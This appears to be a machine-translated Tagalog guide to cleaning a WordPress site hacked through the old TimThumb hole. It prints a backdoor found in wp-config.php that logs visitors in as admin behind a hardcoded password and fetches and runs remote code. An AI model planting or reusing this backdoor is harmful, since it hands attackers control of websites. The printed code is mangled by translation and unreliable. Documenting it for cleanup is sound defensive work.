Kaya kung naaalala mo nang tama, nagkaroon ng isyu sa seguridad sa script ng TimThumb noong Agosto kung saan ay naayos na. Gayunpaman pa rin sa aming sorpresa, maraming mga site ay gumagamit pa rin ng lumang bersyon. Naayos na namin ang tatlong mga site sa ngayon sa nakaraang buwan, isa na kahapon. Kaya makatwirang magsulat lamang ng isang hakbang-hakbang na artikulo, upang ang aming mga user ay maaari lamang sundin ito. Ang lahat ng tatlong mga gumagamit na namin ayusin ang isyu na ito para sa hindi kahit na alam kung ano ang TimThumb ay o kung ginagamit nila ito o hindi.
TimThumb ay isang PHP script na nagpapalitan ng mga imahe. Nagkaroon ng kahinaan sa loob nito, ngunit ligtas na gamitin ngayon.
Kaya paano mo malalaman na na-hack ang iyong site? Kung makakita ka ng isang malaking pulang screen sa iyong browser kapag bumibisita sa iyong site:
Kung nagsisimula kang ma-bombard sa mga email tungkol sa mga gumagamit na na-redirect mula sa iyong site. Malamang, ang kaso ay ang iyong site ay biktima ng ganitong pagsasamantala.
Bilang isang pro-cautionary measure, lahat ay dapat gamitin lamang ang Timthumb Vulnerability Scanner na ito. Sasabihin nito sa iyo kung ginagamit mo ang mas lumang bersyon ng TimThumb. Ang maraming mga klub ng tema ay na-upgrade ang kanilang core kaagad. Kaya masusuri ng plugin na ito kung naka-install ang bagong secure na bersyon ng Timthumb o naka-install ang mas lumang bersyon.
Ngayon kung ang iyong site ay nahulog na biktima sa Timthumb na pagsasamantala, narito ang kailangan mong gawin.
Una kailangan mong tanggalin ang sumusunod na mga file:
/wp-admin/upd.php /wp-content/upd.php
Mag-log in sa WordPress admin panel at muling i-install ang iyong bersyon ng WordPress. Kami ay partikular na naghahanap upang muling i-install ang mga file na ito:
/wp-settings.php /wp-includes/js/jquery/jquery.js /wp-includes/js/110n.js
Pagkatapos ay buksan mo ang iyong wp-config.php kung saan ikaw ay malamang na makahanap ng malaking malware code na ito na ani ang mga kredensyal sa pag-login at cookies. Ang code na ito ay patungo sa ibaba.
kung (isset ($ _ GET ['pingnow']) && isset ($ _ GET ['pass'])) {
kung ($ _GET ['pass'] == '19ca14e7ea6328a42e0eb13d585e4c22') {
kung ($ _GET ['pingnow'] == 'login') {
$ user_login = 'admin';
$ user = get_userdatabylogin ($ user_login);
$ user_id = $ user-> ID;
wp_set_current_user ($ user_id, $ user_login);
wp_set_auth_cookie ($ user_id);
do_action ('wp_login', $ user_login);
}
kung (($ _GET ['pingnow'] == 'exec') && (isset ($ _ GET ['file'])) {
$ ch = curl_init ($ _ GET ['file']);
$ fnm = md5 (rand (0,100)). '. php';
$ fp = fopen ($ fnm, "w");
curl_setopt ($ ch, CURLOPT_FILE, $ fp);
curl_setopt ($ ch, CURLOPT_HEADER, 0);
curl_setopt ($ ch, CURLOPT_TIMEOUT, 5);
curl_exec ($ ch);
curl_close ($ ch);
fclose ($ fp);
echo "";
}
kung (($ _GET ['pingnow'] == 'eval') && (isset ($ _ GET ['file']))) {
$ ch = curl_init ($ _ GET ['file']);
curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, totoo);
curl_setopt ($ ch, CURLOPT_HEADER, 0);
curl_setopt ($ ch, CURLOPT_TIMEOUT, 5);
$ re = curl_exec ($ ch);
curl_close ($ ch);
eval ($ re);
}}}
Sa folder ng iyong tema, hanapin saanman ang TimThumb script ay maaaring iimbak ang mga naka-cache na file. Karaniwan sila sa istraktura na ito:
/wp-content/themes/themename/scripts/cache/external_{MD5Hash}.php
/wp-content/themes/themename/temp/cache/external_{MD5Hash}.php
Tanggalin ang lahat ng ganito. Kung hindi ka sigurado tungkol sa mga bagay, pagkatapos ay tanggalin ang lahat ng bagay na hindi isang file ng imahe.
Ang susunod na bagay na nais mong gawin ay palitan ang timthumb.php gamit ang pinakabagong bersyon na maaaring matagpuan sa http://timthumb.googlecode.com/svn/trunk/timthumb.php
Ngayon magiging magandang ideya na baguhin ang iyong mga password na nagsisimula sa iyong impormasyon sa pag-login sa MySQL sa iyong impormasyon sa pag-login sa WordPress. Huwag kalimutan na baguhin ang password para sa MySQL sa wp-config.php o makakakuha ka ng “Error sa Pagtatatag ng Koneksyon” na screen.
Baguhin ang mga sikretong key sa iyong wp-config.php file. Maaari kang bumuo ng isang bagong susi sa pamamagitan ng pagpunta sa online na generator.
Ngayon tapos ka na. Huwag kalimutang buksan ang lahat ng mga plugin ng pag-cache ng pahina. Bilang isang panukalang-batas, maayos na i-clear din ang cache ng iyong browser at cookies.
Para sa mga developer, subukang gamitin ang tampok na Karagdagang Imahe ng Larawan sa WordPress upang palitan ang mga pag-andar ng Timthumb.
Ipaalam sa amin kung kailangan mo ng karagdagang tulong sa pamamagitan ng paggamit ng aming contact form.